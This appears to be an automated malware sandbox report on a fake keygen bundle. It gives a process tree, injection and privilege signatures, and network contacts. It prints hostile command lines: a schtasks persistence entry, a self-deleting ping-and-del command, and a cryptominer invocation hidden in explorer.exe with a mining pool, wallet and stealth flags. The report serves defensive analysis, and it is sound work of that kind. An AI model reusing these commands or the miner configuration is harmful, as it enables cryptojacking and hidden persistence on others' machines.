N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 464 set thread context of 4036 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 816 wrote to memory of 208 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 816 wrote to memory of 208 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 816 wrote to memory of 208 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 816 wrote to memory of 4840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 816 wrote to memory of 4840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 816 wrote to memory of 4840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 816 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 816 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 816 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 816 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 816 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 816 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 816 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 816 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 816 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 1856 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 1856 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 1856 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 5068 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 5068 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 5068 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 208 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
PID 208 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
PID 208 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
PID 2052 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2052 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2052 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 916 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
PID 916 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
PID 916 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
PID 5068 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 5068 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 5068 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 3012 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 3012 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 3012 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 3012 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 3012 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 3012 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 3012 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3012 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3012 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3012 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 3012 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 5068 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 5068 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 5068 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 3668 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 3668 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 3668 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 4836 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4836 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4836 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3744 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 3744 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 856 wrote to memory of 3092 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 856 wrote to memory of 3092 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3744 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 3744 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 5068 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 5068 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 5068 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 5068 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 5068 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

keygen-pr.exe -p83fsase3Ge

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

keygen-step-1.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

keygen-step-6.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

keygen-step-3.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

keygen-step-4.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104712 0

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 972

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4388 -ip 4388

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1392

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 688 -ip 688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 352

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1192

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 kvaka.li udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
US 8.8.8.8:53 live.goatgame.live udp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 remotenetwork.xyz udp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 best-supply-link.xyz udp
US 8.8.8.8:53 2no.co udp
US 208.95.112.1:80 ip-api.com tcp
RU 186.2.171.3:80 186.2.171.3 tcp
US 104.21.79.229:443 2no.co tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
RU 186.2.171.3:443 186.2.171.3 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 205.9.200.195.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 3.171.2.186.in-addr.arpa udp
US 8.8.8.8:53 229.79.21.104.in-addr.arpa udp
US 104.21.79.229:443 2no.co tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 cleaner-partners.biz udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 104.21.79.229:443 2no.co tcp
SG 37.0.10.214:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
SG 37.0.10.244:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
